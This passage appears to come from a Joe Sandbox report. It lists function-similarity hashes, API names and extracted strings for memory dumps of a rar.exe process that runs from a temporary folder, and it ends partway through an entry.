                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: CreateFile$CloseControlDeviceHandle
                                                        • String ID:
                                                        • API String ID: 998109204-0
                                                        • Opcode ID: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                        • Instruction ID: e415a99b9b19347835c3d2b6d2e1dd550ef87c3d604f544446aab9a64097d5d9
                                                        • Opcode Fuzzy Hash: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                        • Instruction Fuzzy Hash: C0318336618B8186E7609F51B444A9AB7A4FB847F4F504336EEBA03BD4CF3CD5568B40
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: CurrentPriorityThread$ClassProcess
                                                        • String ID:
                                                        • API String ID: 1171435874-0
                                                        • Opcode ID: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
                                                        • Instruction ID: bbce9867137215b92b98f786fd8f7093018562db17bf976b1d80ab31f3014ee7
                                                        • Opcode Fuzzy Hash: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
                                                        • Instruction Fuzzy Hash: CA11337DE1865286E754A710948427CB352EB44754FE04036CB2B17AC1DF2CBC47C6A4
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$abort
                                                        • String ID:
                                                        • API String ID: 1447195878-0
                                                        • Opcode ID: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
                                                        • Instruction ID: 44df4373a0d5896c2601341a76d8ba783ee3e64800fd2e1830551bac8dbc5599
                                                        • Opcode Fuzzy Hash: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
                                                        • Instruction Fuzzy Hash: C4018C28B0960343FB58B7719A65178D3915F48790FD60D3AE93F06BD6ED2CE84742B2
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                        • String ID:
                                                        • API String ID: 502429940-0
                                                        • Opcode ID: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
                                                        • Instruction ID: dbecfd863162d4d3791f2a4377d502c8a93554c355eb257ff13d74de6fe4c7f6
                                                        • Opcode Fuzzy Hash: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
                                                        • Instruction Fuzzy Hash: 8311733A614A5196E314AB20E944599B320F785790F800232D77E136E5CF3DE466C794
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: gfffffff
                                                        • API String ID: 3215553584-1523873471
                                                        • Opcode ID: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
                                                        • Instruction ID: 2b994c3061be460abc1b5e855ca769622b0d4017c57ba3de9fa2d07cd194c6ac
                                                        • Opcode Fuzzy Hash: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
                                                        • Instruction Fuzzy Hash: F9915866B093C686EB219F2995903BCAB55AB21BD0F458532CBAE073D5DE3CE103C352
                                                        APIs
                                                          • Part of subcall function 00007FF7F7ECB6D0: Sleep.KERNEL32(?,?,?,?,00007FF7F7E9CBED,?,00000000,?,00007FF7F7EC7A8C), ref: 00007FF7F7ECB730
                                                        • new.LIBCMT ref: 00007FF7F7EBCFD9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID: rar$rev
                                                        • API String ID: 3472027048-2145959568
                                                        • Opcode ID: 08831a3cfeaaf9fb24c2338f7730f8046a6b3526762b21c2fc697142a1aad8eb
                                                        • Instruction ID: b6eef9d9aa40c691686785afde00c314b23a7eb358fc62d0bfcdd6cf83025018
                                                        • Opcode Fuzzy Hash: 08831a3cfeaaf9fb24c2338f7730f8046a6b3526762b21c2fc697142a1aad8eb
                                                        • Instruction Fuzzy Hash: 91A1F82AA0969241EB18FB2CD4542BCAB65FF44784FC54233DA7F076D6DE2CE546C3A0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: *
                                                        • API String ID: 3215553584-163128923
                                                        • Opcode ID: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
                                                        • Instruction ID: 0fa7b8c0bb090667ae5ab80a3bea2c2b794948194baeb34d4495bf1fb373fd6c
                                                        • Opcode Fuzzy Hash: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
                                                        • Instruction Fuzzy Hash: 3771617AD0961296E764EF6880910BCB7A1FB05F08FA91137DA3B462D4DF3DD482C7A1
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: e+000$gfff
                                                        • API String ID: 3215553584-3030954782
                                                        • Opcode ID: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                        • Instruction ID: 38f7ce12f81a280c85ae90ec85e2744c591ee44b40bfb5337b5cfbb834781b49
                                                        • Opcode Fuzzy Hash: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                        • Instruction Fuzzy Hash: AE519866B187C286E7249B349840369BB81EB40B90F88C632C7BE8BBD5CF2CD006C711
                                                        APIs
                                                        • GetCurrentDirectoryW.KERNEL32(?,?,?,00000800,?,?,00000000,00007FF7F7EA475B,?,00000000,?,?,00007FF7F7EA4620,?,00000000,?), ref: 00007FF7F7EB4633
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory
                                                        • String ID: UNC$\\?\
                                                        • API String ID: 1611563598-253988292
                                                        • Opcode ID: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
                                                        • Instruction ID: a10340a53ebf2a16b284ce688299ebb1cb1e03b66b7cf6ae14c8c93f6be8f163
                                                        • Opcode Fuzzy Hash: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
                                                        • Instruction Fuzzy Hash: CC41B94EA0968240EB207B5DE4415B997516F067C4FC18233DDBF476DAEE3CE94BC2A0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: FileModuleName_invalid_parameter_noinfo
                                                        • String ID: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe
                                                        • API String ID: 3307058713-2403995809
                                                        • Opcode ID: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
                                                        • Instruction ID: fdd62f4cac9fe654fb44431294ba06d0e61b07a226efad18f01ced0e610d4497
                                                        • Opcode Fuzzy Hash: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
                                                        • Instruction Fuzzy Hash: E241D13AA0864285EB14FF25A4400B8F794EF44B94B96443AE92F47BC5DF3CE483C3A1
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: AttributesFilewcsstr
                                                        • String ID: System Volume Information\
                                                        • API String ID: 1592324571-4227249723
                                                        • Opcode ID: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
                                                        • Instruction ID: 25d4fb61f6635d8157e7d4867a63ab3833d2b0f0feb46fbab9ba669b315f7604
                                                        • Opcode Fuzzy Hash: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
                                                        • Instruction Fuzzy Hash: FF31182DA1968245FB50FB21A1506FDAB60AF49BC0F844032EE6E077D6DE3CE453C7A0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: LoadString$fflushswprintf
                                                        • String ID: %d.%02d$[
                                                        • API String ID: 1946543793-195111373
                                                        • Opcode ID: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
                                                        • Instruction ID: 5ddcc31ff6d38c19849f58f061e3ba5c075c7f84e17a340dad679a927f775112
                                                        • Opcode Fuzzy Hash: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
                                                        • Instruction Fuzzy Hash: 3D318F2AA0958645FB50BB24E4157F9A7A0AF85748FC4103AD66F0B7C6DF3CE44AC7A0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: swprintf
                                                        • String ID: fixed%u.$fixed.
                                                        • API String ID: 233258989-2525383582
                                                        • Opcode ID: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
                                                        • Instruction ID: 05bd1a5c72e47753c1637c7dcab017f8d628de906ed98aca8b096c1992930bdf
                                                        • Opcode Fuzzy Hash: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
                                                        • Instruction Fuzzy Hash: 5431B96AA0868151EB10FB29E4417E9A760FB45794FD00233EA6E176DADF3CD507C7A0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: snprintf
